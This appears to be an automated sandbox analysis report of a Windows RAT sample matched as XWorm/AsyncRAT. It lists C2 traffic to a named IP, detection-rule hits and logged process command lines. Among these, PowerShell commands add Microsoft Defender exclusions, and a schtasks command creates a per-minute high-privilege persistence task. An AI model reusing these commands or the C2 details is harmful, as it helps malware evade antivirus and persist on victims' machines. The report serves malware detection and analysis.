                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FFAAC492CF2h0_2_00007FFAAC492B2D

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.7:49806 -> 103.230.121.124:7000
                    Source: Network trafficSuricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 103.230.121.124:7000 -> 192.168.2.7:49806
                    Source: Network trafficSuricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.7:49829 -> 103.230.121.124:7000
                    Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49829 -> 103.230.121.124:7000
                    Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 103.230.121.124:7000 -> 192.168.2.7:49806
                    Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49806 -> 103.230.121.124:7000
                    Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 103.230.121.124:7000 -> 192.168.2.7:49806
                    Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49806 -> 103.230.121.124:7000
                    Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 103.230.121.124:7000 -> 192.168.2.7:49829
                    Source: Malware configuration extractorURLs: 103.230.121.124
                    Source: Yara matchFile source: file.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.file.exe.260000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Word.exe, type: DROPPED
                    Source: global trafficTCP traffic: 192.168.2.7:49806 -> 103.230.121.124:7000
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewASN Name: VPSQUANUS VPSQUANUS
                    Source: unknownDNS query: name: ip-api.com
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: powershell.exe, 0000000B.00000002.1451558022.000001D169939000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1827907029.0000024E3F432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                    Source: powershell.exe, 00000010.00000002.1824109278.0000024E3F346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                    Source: powershell.exe, 00000010.00000002.1824109278.0000024E3F346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                    Source: file.exe, Word.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: powershell.exe, 00000007.00000002.1321120516.0000022D4B1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1438468730.000001D1614B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1588201996.000001661006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000007.00000002.1335289999.0000022D539F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://osoft.co
                    Source: powershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000007.00000002.1304950670.0000022D3B3A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1373555805.000001D1517F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1478158258.0000016600228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: file.exe, 00000000.00000002.2523388920.0000000002681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1304950670.0000022D3B181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1373555805.000001D151441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1478158258.0000016600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1652250573.0000024E26C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000007.00000002.1304950670.0000022D3B3A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1373555805.000001D1517F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1478158258.0000016600228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 0000000B.00000002.1451558022.000001D169961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                    Source: powershell.exe, 0000000E.00000002.1615577139.0000016677A06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co~
                    Source: powershell.exe, 00000007.00000002.1304950670.0000022D3B181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1373555805.000001D151441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1478158258.0000016600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1652250573.0000024E26C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000007.00000002.1321120516.0000022D4B1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1438468730.000001D1614B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1588201996.000001661006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 0.2.file.exe.a60000.0.raw.unpack, RemoteDesktop.cs.Net Code: GetScreen

                    Operating System Destruction

                    barindex
                    Source: C:\Users\user\Desktop\file.exeProcess information set: 01 00 00 00 Jump to behavior

                    System Summary

                    barindex
                    Source: file.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.0.file.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000002.2555959588.0000000012691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000000.1250043956.0000000000262000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\Word.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFAAC4860C60_2_00007FFAAC4860C6
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFAAC49128A0_2_00007FFAAC49128A
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFAAC493E450_2_00007FFAAC493E45
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFAAC4872720_2_00007FFAAC487272
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFAAC4817190_2_00007FFAAC481719
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFAAC489B090_2_00007FFAAC489B09
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFAAC4812F80_2_00007FFAAC4812F8
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFAAC4820F50_2_00007FFAAC4820F5
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFAAC48C5E80_2_00007FFAAC48C5E8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC5430E714_2_00007FFAAC5430E7
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC5430E916_2_00007FFAAC5430E9
                    Source: C:\Users\user\AppData\Roaming\Word.exeCode function: 20_2_00007FFAAC48171920_2_00007FFAAC481719
                    Source: C:\Users\user\AppData\Roaming\Word.exeCode function: 20_2_00007FFAAC4812F820_2_00007FFAAC4812F8
                    Source: C:\Users\user\AppData\Roaming\Word.exeCode function: 20_2_00007FFAAC48103820_2_00007FFAAC481038
                    Source: C:\Users\user\AppData\Roaming\Word.exeCode function: 20_2_00007FFAAC4820F520_2_00007FFAAC4820F5
                    Source: C:\Users\user\AppData\Roaming\Word.exeCode function: 23_2_00007FFAAC47171923_2_00007FFAAC471719
                    Source: C:\Users\user\AppData\Roaming\Word.exeCode function: 23_2_00007FFAAC4712F823_2_00007FFAAC4712F8
                    Source: C:\Users\user\AppData\Roaming\Word.exeCode function: 23_2_00007FFAAC47103823_2_00007FFAAC471038
                    Source: C:\Users\user\AppData\Roaming\Word.exeCode function: 23_2_00007FFAAC4720F523_2_00007FFAAC4720F5
                    Source: C:\Users\user\AppData\Roaming\Word.exeCode function: 24_2_00007FFAAC47171924_2_00007FFAAC471719
                    Source: C:\Users\user\AppData\Roaming\Word.exeCode function: 24_2_00007FFAAC4712F824_2_00007FFAAC4712F8
                    Source: C:\Users\user\AppData\Roaming\Word.exeCode function: 24_2_00007FFAAC47103824_2_00007FFAAC471038
                    Source: C:\Users\user\AppData\Roaming\Word.exeCode function: 24_2_00007FFAAC4720F524_2_00007FFAAC4720F5
                    Source: C:\Users\user\AppData\Roaming\Word.exeCode function: 25_2_00007FFAAC47171925_2_00007FFAAC471719
                    Source: C:\Users\user\AppData\Roaming\Word.exeCode function: 25_2_00007FFAAC4712F825_2_00007FFAAC4712F8
                    Source: C:\Users\user\AppData\Roaming\Word.exeCode function: 25_2_00007FFAAC47103825_2_00007FFAAC471038
                    Source: C:\Users\user\AppData\Roaming\Word.exeCode function: 25_2_00007FFAAC4720F525_2_00007FFAAC4720F5
                    Source: file.exe, 00000000.00000002.2555959588.00000000126F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs file.exe
                    Source: file.exe, 00000000.00000000.1250043956.00000000002C9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs file.exe
                    Source: file.exe, 00000000.00000002.2522399735.0000000000A60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRemoteDesktop.dll< vs file.exe
                    Source: file.exeBinary or memory string: OriginalFilenameXClient.exe4 vs file.exe
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.0.file.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000002.2555959588.0000000012691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000000.1250043956.0000000000262000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Roaming\Word.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: file.exe, RLNc59m3K5qBU9nVpBi0AKzQWHnZ4GB7uwf5x7A0VpPRtOmln5U0LHjGRFKVDduY3yBpI1XMO.csCryptographic APIs: 'TransformFinalBlock'
                    Source: file.exe, RLNc59m3K5qBU9nVpBi0AKzQWHnZ4GB7uwf5x7A0VpPRtOmln5U0LHjGRFKVDduY3yBpI1XMO.csCryptographic APIs: 'TransformFinalBlock'
                    Source: file.exe, mYAr1k08yb0HzmCgp0BEzPHAJWWzMQXamHNPm3NQBAqCoG6fW6xB8GV5ryb6UTU5pbINLp5FL.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Word.exe.0.dr, RLNc59m3K5qBU9nVpBi0AKzQWHnZ4GB7uwf5x7A0VpPRtOmln5U0LHjGRFKVDduY3yBpI1XMO.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Word.exe.0.dr, RLNc59m3K5qBU9nVpBi0AKzQWHnZ4GB7uwf5x7A0VpPRtOmln5U0LHjGRFKVDduY3yBpI1XMO.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Word.exe.0.dr, mYAr1k08yb0HzmCgp0BEzPHAJWWzMQXamHNPm3NQBAqCoG6fW6xB8GV5ryb6UTU5pbINLp5FL.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.file.exe.a60000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.file.exe.a60000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Word.exe.0.dr, ub99fRJjxxhOnbd1IRYK3hmGl4xhrDhQcSfdxKqEc9S0YSzeggxQAVz5.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: Word.exe.0.dr, ub99fRJjxxhOnbd1IRYK3hmGl4xhrDhQcSfdxKqEc9S0YSzeggxQAVz5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: file.exe, ub99fRJjxxhOnbd1IRYK3hmGl4xhrDhQcSfdxKqEc9S0YSzeggxQAVz5.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: file.exe, ub99fRJjxxhOnbd1IRYK3hmGl4xhrDhQcSfdxKqEc9S0YSzeggxQAVz5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/21@1/2
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Word.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Word.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\Lt4TYUUi1TXxaPwR
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6312:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeReversingLabs: Detection: 76%
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Word.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Word.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Word" /tr "C:\Users\user\AppData\Roaming\Word.exe"
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Word.exe C:\Users\user\AppData\Roaming\Word.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Word.exe "C:\Users\user\AppData\Roaming\Word.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Word.exe "C:\Users\user\AppData\Roaming\Word.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Word.exe C:\Users\user\AppData\Roaming\Word.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Word.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Word.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Word" /tr "C:\Users\user\AppData\Roaming\Word.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
